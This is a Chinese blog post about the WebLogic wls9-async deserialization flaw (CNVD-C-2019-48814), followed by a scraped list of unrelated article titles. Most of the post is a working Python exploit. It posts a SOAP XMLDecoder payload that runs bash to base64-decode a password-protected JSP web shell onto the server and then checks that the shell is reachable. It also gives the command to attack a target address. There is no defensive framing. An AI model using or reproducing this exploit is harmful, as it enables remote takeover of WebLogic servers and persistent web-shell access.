CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

网上均有详细的说明(https://github.com/jas502n/CNVD-C-2019-48814)

(https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961)

利用payload 写个 POC 。

利用:url+_async/AsyncResponseService ,判断状态,POST payload  判断是否成功get shell 。

import requests
import sys
def poc():url =str(sys.argv[1])path ="/_async/AsyncResponseService"headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",'Content-Type': "text/xml"}payload = """<?xml version="1.0" encoding="Utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>echo Jmx0OyUNCiAgICAgICAgamF2YS5pby5JbnB1dFN0cmVhbSBpbiA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoIm9yYW5nZSIpKS5nZXRJbnB1dFN0cmVhbSgpOw0KICAgICAgICBpbnQgYSA9IC0xOyAgICAgICAgICANCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgDQogICAgICAgIG91dC5wcmludCgiJmx0O3ByZSZndDsiKTsgICAgICAgICAgDQogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7DQogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgb3V0LnByaW50KCImbHQ7L3ByZSZndDsiKTsNCiUmZ3Q7DQo=|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>"""try:request = requests.post(url+path,data=payload,headers=headers)print '[+] exploit url: %s_async/AsyncResponseService' % urlif request.status_code == 202:print '[+] %s  exploit success!' % urlrequest2 = requests.get(url+'/_async/shell.jsp')if request2.status_code == 200:print '[+]   get shell: %s/_async/shell.jsp  pass is orange ' % urlelse:print '[-]   get shell fail 'else:print '[-] %s  exploit faile' % urlexcept:print '[-] %s  address cannot connect' % url
if __name__=='__main__':poc()

攻击:

python CNVD-C-2019-48814.py http://111.111.111.111:7001/

攻击成功之后,可以获得一个shell GET 密码是orange

测试失败。

转载于:https://www.cnblogs.com/Oran9e/p/10772713.html

CNVD-C-2019-48814 漏洞相关推荐

  1. 奇安信代码卫士报送的漏洞获评“CNVD平台2019年度最具价值漏洞”

    聚焦源代码安全,网罗国内外最新资讯! 奇安信代码安全实验室研究员为某厂商发现漏洞CNVD-2019-24016,第一时间向该厂商报告且协助其修复漏洞.   北京时间2019年12月30日,国家信息安全 ...

  2. 国内首部智能设备安全报告:预计 2019 年漏洞增长率超 20%

    智能设备正在带来日益严重的安全问题,一份安全报告显示 2019 年智能设备的漏洞增长率将超过 20%,远远高于整体漏洞增长率. 11 月 27 日,360"安全大脑"发布了< ...

  3. GitHub 2019年漏洞奖励计划最值得回顾的2个精彩 bug

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 GitHub 发布博客文章指出,截止2020年2月份,GitHub 漏洞奖励计划已走过六个年头.GitHub提到,六年中支付的漏洞奖励 ...

  4. cnvd批量提交以及漏洞盒子

    需要完成的功能点 验证码 输入框 下拉菜单 上传文件 报错信息验证 具体流程 driver打开对应页面 sleep等待一段时间 输入自己的账号密码,验证码(个人使用超级鹰完成验证码识别) 重定向(获取 ...

  5. cnvd事件型高危漏洞挖掘

    1).天眼查查备案  https://belan.tianyancha.com/   查中国联通,中国电信,中国移动,中国铁塔 利用备案号搜索查询更多资产 Fofa搜索:icp="备案号&q ...

  6. CNVD原创漏洞证书总结

    之前打算申请个CNVD的原创漏洞证书.经过这一个多月的时间证书下来了,现在简单总结一下. 原创漏洞审核和处理流程参考此链接:http://www.cnvd.org.cn/webinfo/show/39 ...

  7. 一文读懂安全攻防实战、CNVD漏洞平台

    安全的本质是攻防实战.无论是安全研发,还是安全服务,实战才是硬道理.网络安全的学习过程,就是不断在实战演练中积累实操经验的过程. 除了通过开源安全项目学习外,通过在CNVD漏洞平台尝试挖洞是一条高效的 ...

  8. 奇安信代码安全实验室帮助Red Hat修复多个QEMU高危漏洞,获官方致谢

    聚焦源代码安全,网罗国内外最新资讯! 奇安信代码安全实验室研究员为Red Hat发现六个漏洞(CVE-2020-14364.CVE-2020-10756. CVE-2020-12829. CVE-20 ...

  9. 奇安信代码卫士帮助微软和 Oracle 修复多个高危漏洞,获官方致谢

    聚焦源代码安全,网罗国内外最新资讯! 近日,奇安信代码安全实验室的研究员为微软和Oracle 发现多个高危漏洞,其中为微软发现一个"重要"级别的漏洞(CVE-2020-1426), ...

  10. 奇安信代码卫士帮助微软修复多个高危漏洞,获官方致谢

    聚焦源代码安全,网罗国内外最新资讯! 近日,奇安信代码安全实验室研究员为微软发现四个"重要"级别的漏洞(CVE-2020-1162.CVE-2020-1251.CVE-2020-1 ...

最新文章

  1. SpringBoot自动装载
  2. 计算机网络第三章-数据链路层
  3. python expect模块_成为顶级黑客--python绝技 阅读笔记(五)
  4. django可以生成exe文件吗_把 Django 程序打包为 exe 可执行文件
  5. ROS2学习(七).ROS概念 - ROS客户端库(Ros Client Library)
  6. android input 点击事件失效,React Native:TextInput元素上的onContentSizeChange事件在Android上不起作用...
  7. M0最高优先级的中断设计
  8. Eclipse环境下 spring MVC 入门实例
  9. 使用nginx 和 switchhost实现自定义域名指向本地服务
  10. JDK和JRE区别是什么
  11. 在Chrome、Firefox等高版本浏览器中实现在线编辑、审阅Office文档新方案
  12. 瑞幸咖啡,成败今年见分晓!
  13. 2020年中国银行软件开发中心(北京)校招体会
  14. jit和jitx区别_JIT的核心思想是什么?
  15. python selenium模拟点击
  16. ios13测试版怎么卸载软件,苹果手机升ios13.2后怎么删除app ios13.2卸载软件应用方法...
  17. 这是我所收集的一些工具网站
  18. 字母大小写转换在线工具
  19. 百度2023届暑期实习生面经-产品运营岗
  20. 微信小程序 - 按需注入

热门文章

  1. 【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
  2. 三路合并 —— Git 学习笔记 17
  3. Typora + PicGo + Gitee
  4. 插值查找(按比例查找)
  5. C语言模拟实现(三)-----独占型设备分配
  6. STM32开发 -- 系统软复位
  7. Uboot启动过程详解
  8. zcmu-1646 盒子游戏
  9. PAT——程序运行时间 (1026)
  10. 【译】A Kubernetes quick start for people who know just enough about Docker to get by